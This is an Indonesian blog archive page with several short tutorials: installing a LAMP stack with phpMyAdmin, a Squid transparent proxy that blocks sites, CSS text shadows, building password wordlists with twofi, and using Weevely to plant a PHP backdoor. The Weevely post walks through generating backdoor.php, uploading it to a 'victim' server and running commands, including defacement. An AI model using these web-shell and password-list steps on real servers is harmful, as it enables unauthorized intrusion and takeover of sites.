Showing posts with label Web. Show all posts
Showing posts with label Web. Show all posts

Thursday, November 28, 2013

Install Apache2, PHP5, MySQL & PHPMyAdmin

1. Masuk sebagai root:
sudo su

2. Install apache2
apt-get install apache2

3. Install paket php
apt-get install php5 libapache2-mod-php5

4. Membuat file info.php untuk memastikan php sudah berjalan.
pico /var/www/info.php
Dan Ketikkan:

phpinfo();?>

5. Install mysql.
apt-get install mysql-server mysql-client

6. Install pendukung untuk mysql dan php
apt-get install php5-mysql php5-curl php5-gd php5-idn php-pear php5-imagick php5-imap php5-mcrypt php5-memcache php5-mhash php5-ming php5-ps php5-pspell php5-recode php5-snmp php5-sqlite php5-tidy php5-xmlrpc php5-xsl php5-json

7. Restart apache2
/etc/init.d/apache2 restart

8. Install Phpmyadmin:
apt-get install phpmyadmin
* Configuring phpmyadmin pada tahap instalasi phpmyadmin ada 2 pilihan :
1. apache2 > pilih ini dan enter
2. lighttpd
* Configure database for phpmyadmin with dbconfig-common?
Pilih NO dan enter

9. ln -s /usr/share/phpmyadmin/ /var/www/phpmyadmin

10. Dan terakhir Reload apache2 dan jalankan:
/etc/init.d/apache2 reload
*Done

Wednesday, September 05, 2012

Membuat wordlist sendiri menggunakan twofi

Step :
- Login sebagai root dan instal twofi dr repo (jika anda telah menggunakan Backtrack 5 R3, step ini bisa anda skip)

apt-get install twofi

- Jalankan twofi di menu

root@k43r14:/pentest/passwords/twofi# ruby twofi.rb

download terlebih dahulu file user yang akan digunakan untuk command -U di twofi DISINI.

dan proses pembuatan wordlistnya sebagai berikut :

root@k43r14:/pentest/passwords/twofi# ruby twofi.rb -m 6 -U /media/Data/Linux/DikaBackTrackData/Docs/list/listuser.txt >> /media/Data/Linux/DikaBackTrackData/Docs/list/passnew.lst

command diatas menunjuk ke /media/Data/Linux/DikaBackTrackData/Docs/list/ itu karena saya menyimpan file user dan password k direktory tersebut.

berikut ss dari terminal saya.


Selamat Mencoba.


Source

Saturday, August 04, 2012

Menggunakan Weevely Sebagai Backdoor Web

Oke langsung aja kita bahas cara pemakaiannya.
1.Cara create file backdoor.php nya..

ketik di console weevely generate

misalnya kita mau menaruh file backdoornya di Destop gini caranya

weevely generate password /home/muchlisoft/Destop/backdoor.php

setelah kita ketikkan perintah tersebut maka akan tercipta sebuah file backdoor.php di Destop kita.

2. Selanjutnya setelah file backdoornya sudah jadi maka silahkan sahabat – sahabat upload file backdoor.php tadi ke webserver yang jadi sasaran sahabat. Untuk caranya tidak saya bahas di sini.Cari aja caranya di google banyak kok.

3. Misalkan file backdoor.php sudah kita upload di server dengan alamat http://www.victim.com/backdoor.php.

Kita ketikkan perintah weevely http://www.victim.com/backdoor.php password

Jika sukses maka kemungkinan besar kita sudah bisa untuk ngapain aja di server itu, mau ngedit,hapus,buat ,upload dan upload file di server tersebut. Coba sahabat – sahabat ketikkan perintah – perintah command line di situ.Misalkan kita ketikan perintah ls, pasti akan terlihat semua file yang ada di dalam direktory tersebut. Mau deface juga bisa.heheh

4. Perintah untuk upload file ,misalnya kita mau upload file muchlisoft.php . maka caranya sebagai berikut.

:file.upload /path_file_yang_akan_kita_upload/muchlisoft.php /Path_untuk_menaruh_file_yang_kita_upload/muchlisoft.php

Itu tadi adalah sedikit tentang penggunaan weevely, untuk mengetahui lebih banyak perintah – perintahnya, sahabat bisa memasukkan peritah weevely -h .

Semoga bermanfa’at….

Friday, June 22, 2012

Membangun Proxy Server

Setting interfaces dengan asumsi ada dua interfaces yaitu eth0 dan eth1. Caranya adalah :
Ketik di terminalnya perintah sudo nano /etc/network/interfaces
Ubah isi interfaces menjadi :

auto eth0
iface eth0 inet dhcp
auto eth1
iface eth1 inet static
address 192.168.50.1
netmask 255.255.255.0

lalu simpan perubahannya dengan tekan crtl+x lalu y dan enter.

3. Restart networknya dengan perintah sudo /etc/init.d/networking restart
4. Setelah status bound berarti setting ip sudah benar, lalu aktifkan ip_forward, dengan membuka file rc.local dengan perintah sudo nano /etc/rc.local lalu tambahkan perintah berikut di sebelum exit atau sesudah # by default this script does nothing :

echo 1 > /proc/sys/net/ipv4/ip_forward
exit 0

lalu simpan perubahannya dengan tekan crtl+x lalu y dan enter.

5. lalu untuk mengaktifkan ip_forward masih ada satu tahpan lagi yaitu buka fie /etc/sysctl.conf dengan perintah sudo nano /etc/sysctl.conf dan cari (crtl + w) net.ipv4.ip_forward=1 setelah itu hapus tanda # yangada pada sebeumnya . lalu simpan perubahannya dengan tekan crtl+x lalu y dan enter.
6. Ketik perintah sudo sysctl –p (apabila report nya ada tulisan net.ipv4.ip_forward=1 berarti ip forward sudah aktif)
7. Buat iptables dan merubah port default 80 menjadi 3128 untuk mengatur jalur lalu lintas data yaitu dengan membuka file rc.local kembali dan sesudah echo 1 > /proc/sys/net/ipv4/ip_forward tambahkan perintah berikut :

iptables –t nat –A POSTROUTING –j MASQUERADE
iptables –t nat –A PREROUTING –p tcp - -dport 80 –j REDIRECT - -to-port 3128

kurang lebihnya menjadi seperti berikut :

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –t nat –A POSTROUTING –j MASQUERADE
iptables –t nat –A PREROUTING –p tcp - -dport 80 –j REDIRECT - -to-port 3128

lalu simpan perubahannya dengan tekan crtl+x lalu y dan enter.

8. Aktifkan rc.local dengan perintah sudo /etc/init.d/rc.local start
9. Aktifkan squid dengan terlebih dahulu install squidnya. Perintahnya adalah sudo apt-get update dan setelah itu ketik perintah sudo apt-get install squid.
10. Setelah squid terinstall dengan baik tinggal kita konfigurasi squid tersebut dengan asumsi visible hostname www.opuza2905.com, cache_mgr dikareanza@aol.com, http port 3128 transparent, situs yang diblok adalah adalah www.facebook.com dan www.yoututbe.com.
 11. Buka file squid dengan perintah sudo nano /etc/squid/squid.conf.
12. Cari kata TAG: visible_hostname lalu enter.
13. Setelah ditemukan kata TAG: visible_hostname hapus tanda # dan TAG dan tambahkan sesudah visible_hostname www.smk.sch.id. Kurang lebihnya sebagai berikut :
(Awalnya)

# TAG: visible_hostname

Ganti menjadi

visible_hostname www.opuza2905.com

14. Crtl+w lalu ketik cache_mgr webmaster lalu enter, hapus tanda # yang ada sebelum cache_mgr dang anti webmasternya menjadi alamat email. Berikut tampilannya :
(Awalnya)

# cache_mgr webmaster

Menjadi

cache_mgr dikareanza@aol.com

15. Crtl+w lalu ketik http_port 3128 enter dan tambahkan transparent, kurang lebihnya seperti berikut :
Awalnya

http_port 3128

menjadi

http_port 3128 transparent

16. Buat access list untuk jaringan kita serta acces yang nantinya akan di blok. perintahnya crtl+w ketik acl connect lalu enter, ketik di bawahnya acl situs url_regex –i “/etc/squid/blok” dan acl jaringan src 192.168.50.0/24 kurang lebihnya menjadi seperti berikut :

acl CONNECT method CONNECT.
acl situs url_regex –i “/etc/squid/blok”
acl jaringan src 192.168.50.0/24

17. Masih di squid.conf crtl+w ketik insert your lalu enter dan buat aturan untuk acl acl yang tadi dibuat (mana saja yang di allow dan yang di deny). Dengan menambahkan di ruang kosong yang ada di bawah insert your http_access deny situs, dan dibawahnya lagi http_access allow jaringan. Kurang lebihnya menjadi seperti berikut :

http_access deny situs
http_access allow jaringan

18. Konfigurasi squid sampai tahap ini sudah selesai. Simpan perubahan dengan menekan crtl+x lalu y dan enter.
19. Ketik perintah sudo nano /etc/squid/blok lalu isi di dalamnya facebook youtube atau www.facebook.com www.youtube.com (sama saja)
20. Restart squid kita dengan perintah sudo /etc/init.d/squid restart
21. lihat routing table apakah sudah tidak ada kesalahan atau masih ada, dengan perintah sudo route –n
22. lihat perubahan iptables yang ada apakah masih ada kesalahan atau tidak dengan perintah sudo iptables –t nat –nL
23. setelah kalian yakin tidak ada kesalahan penulisan perintah / script dan tahapan tahapan ini tinggal ketik sudo sudo /etc/init.d/squid restart lalu ketik sudo /etc/init.d/networking restart
24. tahapan akhir adalah test di kient dengan alamat ip client ip address 192.168.50.2, gateway 192.168.50.1, subnet mask 255.255.255.0, dns 8.8.8.8.
25. coba akses ke facebook dan youtube apabila reportnya access denied maka berarti facebook dan youtube berhasil di blok.
26. Coba akses ke google apabila berjalan dengan lancar alias tidak di blok maka konfigurasi squid secara global sudah benar dan tidak ada kesalahan.


Berikut adalah out putnya bila aksess ke facebook dan youtube :



dan berikut bila ke google :



selamat mencoba.

Tuesday, June 19, 2012

Membuat Shadow Text Dengan CSS

Berikut ini contoh text yang telah menggunakan shadow :



Dika Kaeria Reanza


dan ini code yang digunakan :

<!DOCTYPE html>
<html>
<head>
<style type="text/css">
h1
{
text-shadow: 1px 3px 7px blue;
}
</style>
</head>
<body>

<h1>Dika Kaeria Reanza</h1>

</body>
</html>


Selamat mencoba!!!